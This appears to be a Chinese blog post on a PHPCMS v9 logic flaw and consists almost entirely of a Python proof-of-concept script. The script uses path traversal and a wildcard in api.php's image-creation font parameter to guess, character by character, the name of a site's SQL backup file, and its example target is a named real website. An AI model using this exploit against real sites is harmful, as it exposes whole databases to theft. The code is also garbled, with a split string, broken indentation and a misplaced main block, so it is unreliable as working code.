PHPCMSv9逻辑漏洞导致备份文件名可猜测

POC: ! usr bin env python coding=utf-8 import urllib2 def check(url): mark =

POC:

#!/usr/bin/env python
#coding=utf-8
import urllib2
def check(url):  
  mark = True  
  req = urllib2.Request(url)    
  req.add_header('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')    
  response = urllib2.urlopen(req)    
  content = response.read()    
  if 'Cannot' in content:        
      mark = False    
  return mark
  
def guest(target):    
    arr = []    
    num = map(chr, range(48, 58))    
    alpha = map(chr, range(97, 123))    
    exploit = '%s/api.php?
    op=creatimg&txt=dysec&font=/../../../../caches/bakup/default/%s%s<<.sql'
    
    while True:        
       for char in num:            
        if check(exploit % (target, ''.join(arr), char)):               
           arr.append(char)                
           continue        
           
        if len(arr) < 20:            
            for char in alpha:                 
                 if check(exploit % (target, ''.join(arr), char)):                    
                     arr.append(char)                    
                     continue        
                
        elif len(arr) == 20:            
              arr.append('_db_')        
              
        elif len(arr)== 29:            
              arr.append('_1.sql')            
              break        
              
        if len(arr) < 1:            
            print '[*]not find!'            
            return    
            
        print '[*]find: %s/caches/bakup/default/%s' % (target, ''.join(arr))
        
    if __name__ == "__main__":    
        url = 'http://security.douyu.com'    
        #test    
        guest(url)

 

标签: